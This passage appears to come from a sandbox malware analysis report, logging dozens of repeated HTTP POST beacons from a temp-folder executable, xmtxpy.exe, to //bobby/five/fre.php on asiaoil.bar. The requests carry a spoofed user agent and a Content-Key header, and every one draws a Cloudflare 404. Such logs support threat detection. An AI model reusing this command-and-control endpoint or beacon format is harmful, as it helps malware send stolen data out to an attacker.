                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KFC3rc2PYyOGWitcWjhM03gTv0UwrpD%2FeLJzaq90%2BkjJJnsYFLs3%2B9G23tgPe1ch9t2Z3Xrks%2BoXkXgsLvtmsDrXa8JBOdIJfr6DqInywGS59STYxucek4Q2WmLQpw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445eb1e9f9189-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    25192.168.2.2249190172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:29.085941076 CET355OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:29.188222885 CET356INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uD7gJsujl0qEAxulzRwvTC2Sbt%2Bi4TFWvsjpt5CDloaVfn3Dt69l4iJM31MUngIv0nBezN298VraYSCFYdNpO%2FbJ4t7%2BWNOgx7HdyUwSUfBLC4eOt4PcY93RnkUHlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445f3db6a5b3e-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    26192.168.2.2249191172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:30.799654961 CET357OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:30.894473076 CET358INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wvu1d3Vbzy6ZrTPTFWBGN7iEn1tx2RtWGRh2C76Vr5y%2B0NzzM1MCSCMy1A4AVEtbLBuKmRIr5zzqHNenni2AJ%2BwOtJJ179UjFozvWTm5cwFRvpN7D1tfeYfx%2FVlSLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445fe9dc491ed-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    27192.168.2.2249192172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:31.879954100 CET359OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:31.985625029 CET359INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7e4ivEN%2FfJbqg0IR30Nk7YLjE6R7gK9YQJH1DfEk3kbRoonUj0tMEraY%2BRjwLn7cP%2BNl78SF30VWW7AmBXj15TgGfudTHrRaK3bi%2FP7OjjFNWbyUKgOHiQu4SXY%2FXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446054d3a9274-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    28192.168.2.2249193172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:32.951127052 CET360OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:33.053421974 CET361INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WPprCDT9p343%2B%2BVa2BjaOyqYMB95UNCR5Ua%2FE%2FsZWRzD2F%2FUvoXHTkn2yAiBthKWkFusxeyRDME7Rpcj9nFv2dMiYrPffSB1GdxIUmMvBnBIuGG6eMWuphVFNIVyRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4460bfe8a9168-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    29192.168.2.2249194172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:34.006464005 CET362OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:34.138065100 CET363INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wShLmzxohhsviCUMQ%2FlqpiKLuE1FOqvf4YebS5qugs3Dzn05nwu27HDgM4qgHb10Sommq5Eo%2FITERtrckpOYW58EIm11S3Cxr5FX3Wb1wYzMe0KX2DB0%2FCIuyrBw%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4461298c49180-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    3192.168.2.2249168172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:03.831670046 CET316OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:03.955466986 CET317INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lb9okY1H6vGjyVC1u7%2FrtI1IlQS%2BFDAUyP1p%2FRqqpdW3oHWuKdkbXEj1FlsGoYPfJTBdMWMce2JdGAcisXgmjvWPRjePl3xI2oQ%2BLjS4JVazUAB%2FtUVsenR8M%2BuUug%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44555fbc890ee-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    30192.168.2.2249195172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:35.055712938 CET364OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:35.142774105 CET365INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uRm6cbs7qjH2NOHh2tOKIkP%2BdzbOwZXOMBEJgE3gb2LRZ5T9DoyDbWgSAgyAW9SjYweFy2OcxyEn%2BT93qxg4gzWWmZP%2Bi0t5VxRBmaJZLw%2FLRVoZMESNjhIGteoHMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4461928579004-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    31192.168.2.2249196172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:36.072597980 CET366OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:36.184967995 CET367INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xrOr1KSQmX9JZILB3weUMlW6l%2F0jQY3ebDX3HclhX28Mcc%2FxH30ewiGA0h%2B6cIBx8JHVt3F2yuoloaiZkYlnrBJGiKNxRH6q72FSDnO4vOtUB%2F3%2FUP0EEMJM1AusYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4461f7a6a9079-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    32192.168.2.2249197172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:37.120242119 CET367OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:37.238821030 CET368INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RG%2BfeuYDl%2BqDfIJiQqO%2F%2BvdeX%2FsqQOMNdYojKtTw1E0TmD5kZfpZ7nDimmccAbecgCEw4KhPek%2BrNtGEwSzq0DOsMtNFWpBsI22TENldaFbPIU5b5CTiuxOP6VQaaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446260fb19019-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    33192.168.2.2249198172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:38.172976971 CET369OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:38.275609016 CET370INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8i3MYQHtfXVP%2F0fASkC1TmdLbF6CiAiraD%2FH44NC0ykl97qHV9jn8MkbKPqY5BdlYRn49S%2F8lYCjj%2FQu3cIXkHTHLxiFgznNR4%2Bp6Kgrrg52L092%2FlGqFymsCMGR0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4462c9e3791fc-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    34192.168.2.2249199172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:39.224649906 CET371OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:39.314145088 CET372INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8IzBsU9ezcfTcYipeA3VQtk7w40pxZ5hjlcKQvqw49ojoP1nGh40I6q6Dyh76z4LCC%2BA20%2Fsg0VifVwdOdSi33A6OvrYN65%2FpXFFW%2FSM0mozc%2B4piSK803pIJT8SEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446333d2791ff-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    35192.168.2.2249200104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:40.420564890 CET373OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:40.521979094 CET374INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9t3R%2F4b%2BnD1kTHMJA2ZVHrmeMMJ3Bd02VhJ1WPbcEvJly%2BkAhl4QMrCDxePymIvRWvfDOjaPHdcP0k0kjEFpUPsz22Xy7Rg%2F6wzikwLkWIzwoyWJkUL5tvQWI96tAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4463aab43920b-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    36192.168.2.2249201104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:41.439397097 CET375OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:41.572663069 CET375INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U73XLOsc6Oe9yZY%2B47E4Oe8aR4QjbykbQwVxWcy4AoCZmzTRfSc4KodkgvxCsNphdTrX0C20cDMAGUY1y%2Fzw8iNzNLGyI2dqsO%2B6Mc%2FCxzGZVmVZz0bSOwNj1s7QeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446410864918f-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    37192.168.2.2249202172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:42.533999920 CET376OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:42.618619919 CET377INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gufXVp6viiLfqUVAIhTCHjYJOWCjHt2MTTOHWp5%2BFhyL3M%2BbMbx%2BVMYETZElkIaZ%2FIvrsDt5jDpyZjmMZ9o2O%2FwcV9pRsZqOTc1AF0p2Ib213bW35V6pz00NvcCpPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44647eb7b693a-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    38192.168.2.2249203172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:43.544899940 CET378OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:43.664395094 CET379INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yKL07jfvs%2BVU4LY4v4Lf0ZGlr%2FIQtMwEPs3bXhHAZspcC%2BNoewD0Rp%2Bye%2FUTm0R72TSKjFoKvNaY7JUUOQLFHqLgLo%2BRTvtpResbSpFvDqoGUIkATecZSSRbWV5rqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4464e3d16912a-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    39192.168.2.2249204172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:44.584137917 CET380OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:44.682432890 CET381INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YEpekNteQXIJDJauaElbNeLCz0rJIFKhZ7g570xBDVwmYpo12zP6dtthdwoFyYhQ53RMVLKxNG0u7RjPVwRtZkMkV1Qw90wv9Z0CU6vQQlTHweFh1xgcsARiAUxjiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44654bfd79199-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    4192.168.2.2249169172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:04.920207977 CET318OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:05.027216911 CET318INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WGSy9RBpA4nwv8vPkiC6IlReHDy2beH0Xpr8Jw91%2BmfmRccN%2FYfWCgt%2Fb96BC2i38aPjRgJdSwh7RJOrlqreqeiX8LTLhluVlMMPLsLX%2BVqck485IQfR0ZCBs3Abjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4455ccab45c80-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    40192.168.2.2249205104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:45.641460896 CET382OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:45.752800941 CET383INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vgBF41clmh4ryuHtU9aOlwd5HEGXjVWqgWBKt0N2O3lBaHqKVGyePCSnXUW7Z%2B9ZswG3zzpAggxRL3OI9PhK3b7diqp15dvDHTlhkQ9V7NyyEid0hjMzsNR7GBdvGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4465b4f709186-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    41192.168.2.2249206172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:46.729665995 CET383OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:46.816407919 CET384INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qIeTn8QUGJ4PzoL3khYwIjL17%2BBJiTqpZBu%2Bn6l1sSUiSmu%2FH0zc5lyfpLKOHy9tsuu9Y%2F%2BH47s3hpg5DfFC4zroN87eErlds3zDKfV6u79W6o1WqB%2F6UGbnxHqWFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446621d638fc5-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    42192.168.2.2249207172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:47.737185955 CET385OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:47.842878103 CET386INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
